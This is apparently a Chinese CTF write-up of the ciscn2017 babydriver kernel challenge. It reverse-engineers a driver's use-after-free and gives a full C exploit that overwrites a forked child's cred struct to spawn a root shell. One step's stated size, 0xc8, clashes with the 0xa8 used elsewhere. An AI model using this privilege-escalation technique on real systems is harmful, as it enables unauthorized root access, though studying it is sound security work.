kernel_pwn UAF

kernel_pwn UAF

内核的UAF和用户态的差不多,不同的是内核使用的是slab/slub分配器来管理堆块。
题目来源:ciscn2017_babydriver

查看启动脚本:

1
2
#!/bin/bash
qemu-system-x86_64 -initrd rootfs.cpio -kernel bzImage -append 'console=ttyS0 root=/dev/ram oops=panic panic=1' -enable-kvm -monitor /dev/null -m 64M --nographic  -smp cores=1,threads=1 -cpu kvm64,+smep

开启了smep保护(内核态不可执行用户态的代码)。
查看init:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t devtmpfs devtmpfs /dev
chown root:root flag
chmod 400 flag
exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console

insmod /lib/modules/4.4.72/babydriver.ko
chmod 777 /dev/babydev
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
setsid cttyhack setuidgid 1000 sh

umount /prock
umount /sys
poweroff -d 0  -f

看到加载了babydriver.ko模块,也就是存在漏洞的lkm了,ida打开开始干活:
关键函数babyopen():

1
2
3
4
5
6
7
8
9
10
int __fastcall babyopen(inode *inode, file *filp)
{
  __int64 v2; // rdx

  _fentry__(inode, filp);
  babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 64LL);
  babydev_struct.device_buf_len = 0x40LL;
  printk("device open\n", 0x24000C0LL, v2);
  return 0;
}

首先看到全局的结构体babydev_struct有两个成员:

1
2
3
4
5
6
7
babydevice_t    struc ; (sizeof=0x10, align=0x8, copyof_429)
00000000                                         ; XREF: .bss:babydev_struct/r
00000000 device_buf      dq ?                    ; XREF: babyrelease+6/r
00000000                                         ; babyopen+26/w ... ; offset
00000008 device_buf_len  dq ?                    ; XREF: babyopen+2D/w
00000008                                         ; babyioctl+3C/w ...
00000010 babydevice_t    ends

每当打开一个设备时,都会通过kmalloc申请大小为0x40的内存其ptr赋给device_buf,0x40给到device_buf_len。由于它是定义在全局的结构体,我们每次open都会更新该struct的内容。
接下来baby_ioctl():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
__int64 __fastcall babyioctl(file *filp, unsigned int command, unsigned __int64 arg)
{
  size_t v3; // rdx
  size_t v4; // rbx
  __int64 v5; // rdx
  __int64 result; // rax

  _fentry__(filp, *(_QWORD *)&command);
  v4 = v3;
  if ( command == 0x10001 )
  {
    kfree(babydev_struct.device_buf);
    babydev_struct.device_buf = (char *)_kmalloc(v4, 0x24000C0LL);
    babydev_struct.device_buf_len = v4;
    printk("alloc done\n", 0x24000C0LL, v5);
    result = 0LL;
  }
  else
  {
    printk(&unk_2EB, v3, v3);
    result = -22LL;
  }
  return result;
}

先kfree掉struct里device_buf指向的内存,之后kamlloc大小可控的内存并更新结构体。
baby_write():

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
ssize_t __fastcall babywrite(file *filp, const char *buffer, size_t length, loff_t *offset)
{
  size_t v4; // rdx
  ssize_t result; // rax
  ssize_t v6; // rbx

  _fentry__(filp, buffer);
  if ( !babydev_struct.device_buf )
    return -1LL;
  result = -2LL;
  if ( babydev_struct.device_buf_len > v4 )
  {
    v6 = v4;
    copy_from_user();
    result = v6;
  }
  return result;
}

可以向结构体里的device_buf写入内容。

baby_release():

1
2
3
4
5
6
7
8
9
int __fastcall babyrelease(inode *inode, file *filp)
{
  __int64 v2; // rdx

  _fentry__(inode, filp);
  kfree(babydev_struct.device_buf);
  printk("device release\n", filp, v2);
  return 0;
}

kfree掉device_buf,但没置0。

分析完我们可以发现问题就在于我们无论是什么操作都是基于这个babydev_struct结构体,但这个结构体是全局的,如果我们open两次的话第一次kmalloc的ptr就会被第二次kmalloc的ptr覆盖,也就是说我们无论是对fd1进行操作还是对fd2进行操作将会是同一块内存,如果close(fd1)而对fd2进行操作就可实现UAF的效果。

那该如何提权呢?容易想到劫持cred结构体改写uidgid,具体思路如下:
1.open两次得到fd1.fd2
2.利用ioctl改struct保存0xc8大小的堆块(cred结构体大小为0xa8)
3.close(fd1)此时0xa8大小的内存被kfree()
4.fork出子进程,在进程创建时会申请存放cred结构体的内存,此时刚被kfree的堆块被申请出来。
5.通过对fd2进行write操作改写cred结构体的uidgid=0完成提权。

调试:
执行完第二步的结构体:

1
2
3
4
gef➤  x/20gx 0xffffffffc00024c9-1
0xffffffffc00024c8:	0x0000000000000000	0xffff880003ce16c0
0xffffffffc00024d8:	0x00000000000000a8	0x0000000000000000
0xffffffffc00024e8:	0x0000000000000000	0x0000000000000000

write前(已经劫持cred):

1
2
3
4
5
6
7
8
gef➤  x/20gx 0xffff880003ce16c0-0x10
0xffff880003ce16b0:	0x0000000000000000	0x0000000000000000
0xffff880003ce16c0:	0x000003e800000002	0x000003e8000003e8
0xffff880003ce16d0:	0x000003e8000003e8	0x000003e8000003e8
0xffff880003ce16e0:	0x00000000000003e8	0x0000000000000000
0xffff880003ce16f0:	0x0000000000000000	0x0000000000000000
0xffff880003ce1700:	0x0000003fffffffff	0x0000000000000000
0xffff880003ce1710:	0x0000000000000000	0x0000000000000000

write后:

1
2
3
4
5
6
7
8
gef➤  x/20gx 0xffff880003ce16c0-0x10
0xffff880003ce16b0:	0x0000000000000000	0x0000000000000000
0xffff880003ce16c0:	0x0000000000000000	0x0000000000000000
0xffff880003ce16d0:	0x0000000000000000	0x000003e800000000
0xffff880003ce16e0:	0x00000000000003e8	0x0000000000000000
0xffff880003ce16f0:	0x0000000000000000	0x0000000000000000
0xffff880003ce1700:	0x0000003fffffffff	0x0000000000000000
0xffff880003ce1710:	0x0000000000000000	0x0000000000000000

对照内核cred结构体源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    struct rcu_head rcu;        /* RCU deletion hook */
};

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stropts.h>
#include <sys/wait.h>
#include <sys/stat.h>

int main()
{
    int fd1 = open("/dev/babydev", 2);
    int fd2 = open("/dev/babydev", 2);

    ioctl(fd1, 0x10001, 0xa8);
    close(fd1);

    int pid = fork();
    if(pid == 0)
    {
        char zeros[30] = {0};
        write(fd2, zeros, 28);

        if(getuid() == 0)
        {
            system("/bin/sh");
            exit(0);
        }
    }

    else
    {
        wait(NULL);
    }
    close(fd2);

    return 0;
}

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Pwner<br>CTF is a part of my life.<br>